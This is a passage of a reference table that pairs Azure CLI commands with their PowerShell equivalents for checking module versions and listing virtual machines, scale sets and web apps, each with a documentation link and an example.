56Show the versions of Azure CLI modules[az version](https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-version)az version \[--subscription\][PowerShellGet](https://docs.microsoft.com/en-us/powershell/module/powershellget/get-installedmodule?view=powershell-7)Get-InstalledModule Azure -AllVersions
57Manage Linux or Windows virtual machines[az vm](https://docs.microsoft.com/en-us/cli/azure/vm)az vm list -g myRG[Az.Compute](https://docs.microsoft.com/en-us/powershell/module/az.compute/?view=azps-4.4.0#virtual_machines)Get-AzVM -ResourceGroupName "myRG" -Name "VirtualMachine07"
58Manage Virtual Machine Scale Set (VMSS)[az vmss](https://docs.microsoft.com/en-us/cli/azure/vmss)az vmss list --resource-group myRG[Az.Compute](https://docs.microsoft.com/en-us/powershell/module/az.compute/?view=azps-4.4.0#vm_scale_sets)Get-AzVmss -ResourceGroupName "Group001" -VMScaleSetName "VMSS001"
59Manage web apps[az webapp](https://docs.microsoft.com/en-us/cli/azure/webapp)az webapp list --query "\[?state=='Running'\]"[Az-WebApp](https://docs.microsoft.com/en-us/powershell/module/azurerm.websites/get-azurermwebapp?view=azurermps-6.13.0)Get-AzWebApp -myRG "Default-Web-WestUS" -Name "ContosoSite"